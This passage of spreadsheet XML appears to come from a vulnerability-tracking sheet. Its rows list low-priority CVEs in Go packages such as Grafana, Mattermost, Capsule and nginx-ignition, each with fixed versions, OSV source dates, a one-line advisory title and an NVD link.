      <c r="T162" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19032</t>
        </is>
      </c>
    </row>
    <row r="163">
      <c r="A163" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B163" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C163" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-32599</t>
        </is>
      </c>
      <c r="D163" s="5" t="inlineStr"/>
      <c r="E163" s="5" t="inlineStr"/>
      <c r="F163" s="5" t="inlineStr"/>
      <c r="G163" s="5" t="inlineStr"/>
      <c r="H163" s="5" t="inlineStr"/>
      <c r="I163" s="5" t="inlineStr"/>
      <c r="J163" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K163" s="5" t="inlineStr"/>
      <c r="L163" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/gravitl/netmaker</t>
        </is>
      </c>
      <c r="M163" s="5" t="inlineStr">
        <is>
          <t>1.5.0</t>
        </is>
      </c>
      <c r="N163" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O163" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P163" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q163" s="5" t="inlineStr"/>
      <c r="R163" s="5" t="inlineStr"/>
      <c r="S163" s="5" t="inlineStr">
        <is>
          <t>Netmaker has a boolean‑based SQL Injection in github.com/gravitl/netmaker</t>
        </is>
      </c>
      <c r="T163" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-32599</t>
        </is>
      </c>
    </row>
    <row r="164">
      <c r="A164" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B164" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C164" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42127</t>
        </is>
      </c>
      <c r="D164" s="5" t="inlineStr"/>
      <c r="E164" s="5" t="inlineStr"/>
      <c r="F164" s="5" t="inlineStr"/>
      <c r="G164" s="5" t="inlineStr"/>
      <c r="H164" s="5" t="inlineStr"/>
      <c r="I164" s="5" t="inlineStr"/>
      <c r="J164" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K164" s="5" t="inlineStr"/>
      <c r="L164" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/grafana/grafana</t>
        </is>
      </c>
      <c r="M164" s="5" t="inlineStr"/>
      <c r="N164" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O164" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P164" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q164" s="5" t="inlineStr"/>
      <c r="R164" s="5" t="inlineStr"/>
      <c r="S164" s="5" t="inlineStr">
        <is>
          <t>Grafana: Pre-authentication denial of service in the public dashboard query handler in github.com/grafana/grafana.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github.com/grafana/grafana before v1.9.2-0.20260616075434-82ef13993059.</t>
        </is>
      </c>
      <c r="T164" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42127</t>
        </is>
      </c>
    </row>
    <row r="165">
      <c r="A165" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B165" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C165" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42129</t>
        </is>
      </c>
      <c r="D165" s="5" t="inlineStr"/>
      <c r="E165" s="5" t="inlineStr"/>
      <c r="F165" s="5" t="inlineStr"/>
      <c r="G165" s="5" t="inlineStr"/>
      <c r="H165" s="5" t="inlineStr"/>
      <c r="I165" s="5" t="inlineStr"/>
      <c r="J165" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K165" s="5" t="inlineStr"/>
      <c r="L165" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/grafana/grafana</t>
        </is>
      </c>
      <c r="M165" s="5" t="inlineStr"/>
      <c r="N165" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O165" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P165" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q165" s="5" t="inlineStr"/>
      <c r="R165" s="5" t="inlineStr"/>
      <c r="S165" s="5" t="inlineStr">
        <is>
          <t>Grafana Loki datasource plugin's callResource handler contains a path traversal vulnerability. in github.com/grafana/grafana.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github.com/grafana/grafana before v1.9.2-0.20260616075434-82ef13993059.</t>
        </is>
      </c>
      <c r="T165" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42129</t>
        </is>
      </c>
    </row>
    <row r="166">
      <c r="A166" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B166" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C166" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-5139</t>
        </is>
      </c>
      <c r="D166" s="5" t="inlineStr"/>
      <c r="E166" s="5" t="inlineStr"/>
      <c r="F166" s="5" t="inlineStr"/>
      <c r="G166" s="5" t="inlineStr"/>
      <c r="H166" s="5" t="inlineStr"/>
      <c r="I166" s="5" t="inlineStr"/>
      <c r="J166" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K166" s="5" t="inlineStr"/>
      <c r="L166" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/mattermost/mattermost-server</t>
        </is>
      </c>
      <c r="M166" s="5" t="inlineStr">
        <is>
          <t>10.11.18+incompatible, 11.5.6+incompatible, 11.6.3+incompatible, 11.7.1+incompatible</t>
        </is>
      </c>
      <c r="N166" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O166" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P166" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q166" s="5" t="inlineStr"/>
      <c r="R166" s="5" t="inlineStr"/>
      <c r="S166" s="5" t="inlineStr">
        <is>
          <t>Mattermost doesn't enforce administrator authorization on the {{setDefaultInstance}} call within the {{/gitlab connect}} command handler in github.com/mattermost/mattermost-server</t>
        </is>
      </c>
      <c r="T166" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-5139</t>
        </is>
      </c>
    </row>
    <row r="167">
      <c r="A167" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B167" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C167" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58197</t>
        </is>
      </c>
      <c r="D167" s="5" t="inlineStr"/>
      <c r="E167" s="5" t="inlineStr"/>
      <c r="F167" s="5" t="inlineStr"/>
      <c r="G167" s="5" t="inlineStr"/>
      <c r="H167" s="5" t="inlineStr"/>
      <c r="I167" s="5" t="inlineStr"/>
      <c r="J167" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K167" s="5" t="inlineStr"/>
      <c r="L167" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/stacklok/toolhive</t>
        </is>
      </c>
      <c r="M167" s="5" t="inlineStr">
        <is>
          <t>0.30.1</t>
        </is>
      </c>
      <c r="N167" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O167" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P167" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q167" s="5" t="inlineStr"/>
      <c r="R167" s="5" t="inlineStr"/>
      <c r="S167" s="5" t="inlineStr">
        <is>
          <t>ToolHive: containerized MCP servers can reach host services via host.docker.internal, enabling lateral movement in github.com/stacklok/toolhive</t>
        </is>
      </c>
      <c r="T167" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58197</t>
        </is>
      </c>
    </row>
    <row r="168">
      <c r="A168" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B168" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C168" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6062</t>
        </is>
      </c>
      <c r="D168" s="5" t="inlineStr"/>
      <c r="E168" s="5" t="inlineStr"/>
      <c r="F168" s="5" t="inlineStr"/>
      <c r="G168" s="5" t="inlineStr"/>
      <c r="H168" s="5" t="inlineStr"/>
      <c r="I168" s="5" t="inlineStr"/>
      <c r="J168" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K168" s="5" t="inlineStr"/>
      <c r="L168" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/mattermost/mattermost-server</t>
        </is>
      </c>
      <c r="M168" s="5" t="inlineStr">
        <is>
          <t>10.11.18+incompatible, 11.5.6+incompatible, 11.6.3+incompatible, 11.7.1+incompatible</t>
        </is>
      </c>
      <c r="N168" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O168" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P168" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q168" s="5" t="inlineStr"/>
      <c r="R168" s="5" t="inlineStr"/>
      <c r="S168" s="5" t="inlineStr">
        <is>
          <t>Mattermost doesn't validate channel ownership of an existing subscription before applying edits in github.com/mattermost/mattermost-server</t>
        </is>
      </c>
      <c r="T168" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6062</t>
        </is>
      </c>
    </row>
    <row r="169">
      <c r="A169" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B169" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C169" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61554</t>
        </is>
      </c>
      <c r="D169" s="5" t="inlineStr"/>
      <c r="E169" s="5" t="inlineStr"/>
      <c r="F169" s="5" t="inlineStr"/>
      <c r="G169" s="5" t="inlineStr"/>
      <c r="H169" s="5" t="inlineStr"/>
      <c r="I169" s="5" t="inlineStr"/>
      <c r="J169" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K169" s="5" t="inlineStr"/>
      <c r="L169" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/jm33-m0/emp3r0r/core</t>
        </is>
      </c>
      <c r="M169" s="5" t="inlineStr">
        <is>
          <t>0.0.0-20260531142011-aed3d81641ab</t>
        </is>
      </c>
      <c r="N169" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O169" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P169" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q169" s="5" t="inlineStr"/>
      <c r="R169" s="5" t="inlineStr"/>
      <c r="S169" s="5" t="inlineStr">
        <is>
          <t>emp3r0r has an unauthenticated HTTP Polling DoS in github.com/jm33-m0/emp3r0r/core</t>
        </is>
      </c>
      <c r="T169" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61554</t>
        </is>
      </c>
    </row>
    <row r="170">
      <c r="A170" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B170" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C170" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61628</t>
        </is>
      </c>
      <c r="D170" s="5" t="inlineStr"/>
      <c r="E170" s="5" t="inlineStr"/>
      <c r="F170" s="5" t="inlineStr"/>
      <c r="G170" s="5" t="inlineStr"/>
      <c r="H170" s="5" t="inlineStr"/>
      <c r="I170" s="5" t="inlineStr"/>
      <c r="J170" s="5" t="inlineStr">
        <is>
          <t>github, nginx, go, gin</t>
        </is>
      </c>
      <c r="K170" s="5" t="inlineStr"/>
      <c r="L170" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/lucasdillmann/nginx-ignition</t>
        </is>
      </c>
      <c r="M170" s="5" t="inlineStr"/>
      <c r="N170" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O170" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P170" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q170" s="5" t="inlineStr"/>
      <c r="R170" s="5" t="inlineStr"/>
      <c r="S170" s="5" t="inlineStr">
        <is>
          <t>nginx ignition has Unauthenticated Admin Account Creation via Onboarding Race Condition in github.com/lucasdillmann/nginx-ignition.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github.com/lucasdillmann/nginx-ignition before v0.0.0-20260621194639-0586b4e55ab.</t>
        </is>
      </c>
      <c r="T170" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61628</t>
        </is>
      </c>
    </row>
    <row r="171">
      <c r="A171" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B171" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C171" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61629</t>
        </is>
      </c>
      <c r="D171" s="5" t="inlineStr"/>
      <c r="E171" s="5" t="inlineStr"/>
      <c r="F171" s="5" t="inlineStr"/>
      <c r="G171" s="5" t="inlineStr"/>
      <c r="H171" s="5" t="inlineStr"/>
      <c r="I171" s="5" t="inlineStr"/>
      <c r="J171" s="5" t="inlineStr">
        <is>
          <t>github, nginx, go, gin</t>
        </is>
      </c>
      <c r="K171" s="5" t="inlineStr"/>
      <c r="L171" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/lucasdillmann/nginx-ignition</t>
        </is>
      </c>
      <c r="M171" s="5" t="inlineStr">
        <is>
          <t>0.0.0-20260526022344-0c988fc1277c</t>
        </is>
      </c>
      <c r="N171" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O171" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P171" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q171" s="5" t="inlineStr"/>
      <c r="R171" s="5" t="inlineStr"/>
      <c r="S171" s="5" t="inlineStr">
        <is>
          <t>nginx ignition has ParseAcceptLanguage `_` separator bypass that enables ~75x CPU amplification via Accept-Language header in i18nMiddleware in github.com/lucasdillmann/nginx-ignition</t>
        </is>
      </c>
      <c r="T171" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61629</t>
        </is>
      </c>
    </row>
    <row r="172">
      <c r="A172" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B172" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C172" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61630</t>
        </is>
      </c>
      <c r="D172" s="5" t="inlineStr"/>
      <c r="E172" s="5" t="inlineStr"/>
      <c r="F172" s="5" t="inlineStr"/>
      <c r="G172" s="5" t="inlineStr"/>
      <c r="H172" s="5" t="inlineStr"/>
      <c r="I172" s="5" t="inlineStr"/>
      <c r="J172" s="5" t="inlineStr">
        <is>
          <t>github, nginx, go, gin</t>
        </is>
      </c>
      <c r="K172" s="5" t="inlineStr"/>
      <c r="L172" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/lucasdillmann/nginx-ignition</t>
        </is>
      </c>
      <c r="M172" s="5" t="inlineStr">
        <is>
          <t>0.0.0-20260328015550-8d35e1eb5dd6</t>
        </is>
      </c>
      <c r="N172" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O172" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P172" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q172" s="5" t="inlineStr"/>
      <c r="R172" s="5" t="inlineStr"/>
      <c r="S172" s="5" t="inlineStr">
        <is>
          <t>nginx ignition has TOTP Reuse During Validity Window in github.com/lucasdillmann/nginx-ignition</t>
        </is>
      </c>
      <c r="T172" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61630</t>
        </is>
      </c>
    </row>
    <row r="173">
      <c r="A173" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B173" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C173" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61672</t>
        </is>
      </c>
      <c r="D173" s="5" t="inlineStr"/>
      <c r="E173" s="5" t="inlineStr"/>
      <c r="F173" s="5" t="inlineStr"/>
      <c r="G173" s="5" t="inlineStr"/>
      <c r="H173" s="5" t="inlineStr"/>
      <c r="I173" s="5" t="inlineStr"/>
      <c r="J173" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K173" s="5" t="inlineStr"/>
      <c r="L173" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/projectcapsule/capsule</t>
        </is>
      </c>
      <c r="M173" s="5" t="inlineStr">
        <is>
          <t>0.13.7</t>
        </is>
      </c>
      <c r="N173" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O173" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P173" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q173" s="5" t="inlineStr"/>
      <c r="R173" s="5" t="inlineStr"/>
      <c r="S173" s="5" t="inlineStr">
        <is>
          <t>Capsule: Tenant owner bypasses Capsule's forbidden namespace/service/node label and annotation enforcement in github.com/projectcapsule/capsule</t>
        </is>
      </c>
      <c r="T173" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61672</t>
        </is>
      </c>
    </row>
    <row r="174">
      <c r="A174" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B174" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C174" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61682</t>
        </is>
      </c>
      <c r="D174" s="5" t="inlineStr"/>
      <c r="E174" s="5" t="inlineStr"/>
      <c r="F174" s="5" t="inlineStr"/>
      <c r="G174" s="5" t="inlineStr"/>
      <c r="H174" s="5" t="inlineStr"/>
      <c r="I174" s="5" t="inlineStr"/>
      <c r="J174" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K174" s="5" t="inlineStr"/>
      <c r="L174" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/kcp-dev/kcp</t>
        </is>
      </c>
      <c r="M174" s="5" t="inlineStr">
        <is>
          <t>0.31.4, 0.32.2</t>
        </is>
      </c>
      <c r="N174" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O174" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P174" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q174" s="5" t="inlineStr"/>
      <c r="R174" s="5" t="inlineStr"/>
      <c r="S174" s="5" t="inlineStr">
        <is>
          <t>kcp front-proxy does not strip inbound X-Remote-* identity headers, allowing any authenticated client to inject groups/warrants and impersonate system:masters in any workspace in github.com/kcp-dev/kcp</t>
        </is>
      </c>
      <c r="T174" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61682</t>
        </is>
      </c>
    </row>
    <row r="175">
      <c r="A175" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B175" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C175" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61687</t>
        </is>
      </c>
      <c r="D175" s="5" t="inlineStr"/>
      <c r="E175" s="5" t="inlineStr"/>
      <c r="F175" s="5" t="inlineStr"/>
      <c r="G175" s="5" t="inlineStr"/>
      <c r="H175" s="5" t="inlineStr"/>
      <c r="I175" s="5" t="inlineStr"/>
      <c r="J175" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K175" s="5" t="inlineStr"/>
      <c r="L175" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/hatchet-dev/hatchet</t>
        </is>
      </c>
      <c r="M175" s="5" t="inlineStr"/>
      <c r="N175" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O175" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P175" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q175" s="5" t="inlineStr"/>
      <c r="R175" s="5" t="inlineStr"/>
      <c r="S175" s="5" t="inlineStr">
        <is>
          <t>Hatchet - Unauthenticated OAuth state CSRF / login-CSRF via empty-state collision in ValidateOAuthState in hatchet in github.com/hatchet-dev/hatchet.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github.com/hatchet-dev/hatchet before v0.91.1.</t>
        </is>
      </c>
      <c r="T175" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61687</t>
        </is>
      </c>
    </row>
    <row r="176">
      <c r="A176" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B176" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C176" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61709</t>
        </is>
      </c>
      <c r="D176" s="5" t="inlineStr"/>
      <c r="E176" s="5" t="inlineStr"/>
      <c r="F176" s="5" t="inlineStr"/>
      <c r="G176" s="5" t="inlineStr"/>
      <c r="H176" s="5" t="inlineStr"/>
      <c r="I176" s="5" t="inlineStr"/>
      <c r="J176" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K176" s="5" t="inlineStr"/>
      <c r="L176" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/openfga/openfga</t>
        </is>
      </c>
      <c r="M176" s="5" t="inlineStr">
        <is>
          <t>1.18.1</t>
        </is>
      </c>
      <c r="N176" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O176" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P176" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q176" s="5" t="inlineStr"/>
      <c r="R176" s="5" t="inlineStr"/>
      <c r="S176" s="5" t="inlineStr">
        <is>
          <t>OpenFGA: ListUsers returns a deliberately-excluded user when a `but not` exclusion under a type-bound wildcard is intersected (`and`) with another relation that also grants that user in github.com/openfga/openfga</t>
        </is>
      </c>
      <c r="T176" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61709</t>
        </is>
      </c>
    </row>
    <row r="177">
      <c r="A177" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B177" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C177" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61794</t>
        </is>
      </c>
      <c r="D177" s="5" t="inlineStr"/>
      <c r="E177" s="5" t="inlineStr"/>
      <c r="F177" s="5" t="inlineStr"/>
      <c r="G177" s="5" t="inlineStr"/>
      <c r="H177" s="5" t="inlineStr"/>
      <c r="I177" s="5" t="inlineStr"/>
      <c r="J177" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K177" s="5" t="inlineStr"/>
      <c r="L177" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/projectcapsule/capsule</t>
        </is>
      </c>
      <c r="M177" s="5" t="inlineStr">
        <is>
          <t>0.13.7</t>
        </is>
      </c>
      <c r="N177" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O177" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P177" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q177" s="5" t="inlineStr"/>
      <c r="R177" s="5" t="inlineStr"/>
      <c r="S177" s="5" t="inlineStr">
        <is>
          <t>Capsule: Malformed ForbiddenAnnotations.Regex can bypass Tenant validation and trigger namespace admission panic in github.com/projectcapsule/capsule</t>
        </is>
      </c>
      <c r="T177" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61794</t>
        </is>
      </c>
    </row>
    <row r="178">
      <c r="A178" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B178" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C178" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61795</t>
        </is>
      </c>
      <c r="D178" s="5" t="inlineStr"/>
      <c r="E178" s="5" t="inlineStr"/>
      <c r="F178" s="5" t="inlineStr"/>
      <c r="G178" s="5" t="inlineStr"/>
      <c r="H178" s="5" t="inlineStr"/>
      <c r="I178" s="5" t="inlineStr"/>
      <c r="J178" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K178" s="5" t="inlineStr"/>
      <c r="L178" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/projectcapsule/capsule</t>
        </is>
      </c>
      <c r="M178" s="5" t="inlineStr">
        <is>
          <t>0.13.7</t>
        </is>
      </c>
      <c r="N178" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O178" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P178" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q178" s="5" t="inlineStr"/>
      <c r="R178" s="5" t="inlineStr"/>
      <c r="S178" s="5" t="inlineStr">
        <is>
          <t>Capsule: hostnameRegexHandler.OnUpdate validates stale (old) Tenant regex, allowing invalid AllowedHostnames regex to bypass webhook validation in github.com/projectcapsule/capsule</t>
        </is>
      </c>
      <c r="T178" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61795</t>
        </is>
      </c>
    </row>
    <row r="179">
      <c r="A179" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B179" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C179" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61833</t>
        </is>
      </c>
      <c r="D179" s="5" t="inlineStr"/>
      <c r="E179" s="5" t="inlineStr"/>
      <c r="F179" s="5" t="inlineStr"/>
      <c r="G179" s="5" t="inlineStr"/>
      <c r="H179" s="5" t="inlineStr"/>
      <c r="I179" s="5" t="inlineStr"/>
      <c r="J179" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K179" s="5" t="inlineStr"/>
      <c r="L179" s="5" t="inlineStr">
        <is>
          <t>Go:zotregistry.dev/zot, Go:zotregistry.dev/zot/v2</t>
        </is>
      </c>
      <c r="M179" s="5" t="inlineStr">
        <is>
          <t>2.1.18</t>
        </is>
      </c>
      <c r="N179" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O179" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P179" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q179" s="5" t="inlineStr"/>
      <c r="R179" s="5" t="inlineStr"/>
      <c r="S179" s="5" t="inlineStr">
        <is>
          <t>zot: Bearer authentication maps DELETE to push scope, allowing unauthorized deletion in zotregistry.dev/zot</t>
        </is>
      </c>
      <c r="T179" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61833</t>
        </is>
      </c>
    </row>
    <row r="180">
      <c r="A180" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B180" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C180" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61834</t>
        </is>
      </c>
      <c r="D180" s="5" t="inlineStr"/>
      <c r="E180" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F180" s="5" t="inlineStr">
        <is>
